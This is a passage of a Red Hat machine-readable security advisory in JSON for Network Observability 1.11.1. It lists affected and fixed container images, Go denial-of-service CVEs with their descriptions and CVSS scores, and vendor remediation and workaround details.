"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "golang: net/url: Memory exhaustion in query parameter parsing in net/url"
},
{
"cve": "CVE-2025-61728",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-01-28T20:01:39.965024+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2434431"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the archive/zip package in the Go standard library. A super-linear file name indexing algorithm is used in the first time a file in an archive is opened. A crafted zip archive containing a specific arrangement of file names can cause an excessive CPU and memory consumption. A Go application processing a malicious archive can become unresponsive or crash, resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: archive/zip: Excessive CPU consumption when building archive index in archive/zip",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this flaw, an attacker needs to be able to process a malicious zip archive with an application using the archive/zip package. Additionally, this vulnerability can cause a Go application to consume an excessive amount of CPU and memory, eventually resulting in a denial of service with no other security impact. Due to these reasons, this flaw has been rated with a moderate severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x"
],
"known_not_affected": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-61728"
},
{
"category": "external",
"summary": "RHBZ#2434431",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2434431"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-61728",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61728"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-61728",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61728"
},
{
"category": "external",
"summary": "https://go.dev/cl/736713",
"url": "https://go.dev/cl/736713"
},
{
"category": "external",
"summary": "https://go.dev/issue/77102",
"url": "https://go.dev/issue/77102"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc",
"url": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4342",
"url": "https://pkg.go.dev/vuln/GO-2026-4342"
}
],
"release_date": "2026-01-28T19:30:31.354000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-02T07:50:38+00:00",
"details": "For details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6428"
},
{
"category": "workaround",
"details": "To mitigate this vulnerability, implement a timeout in your archive/zip processing logic to abort the operation if it exceeds a few seconds, preventing the application from consuming an excessive amount of resources.",
"product_ids": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "golang: archive/zip: Excessive CPU consumption when building archive index in archive/zip"
},
{
"cve": "CVE-2025-61729",
"cwe": {
"id": "CWE-1050",
"name": "Excessive Platform Resource Consumption within a Loop"
},
"discovery_date": "2025-12-02T20:01:45.330964+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2418462"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in golang. A remote attacker could exploit this vulnerability by providing a specially crafted certificate during the error string construction process within the `HostnameError.Error()` function. This flaw, caused by unbounded string concatenation, leads to excessive resource consumption. Successful exploitation can result in a denial of service (DoS) for the affected system.",
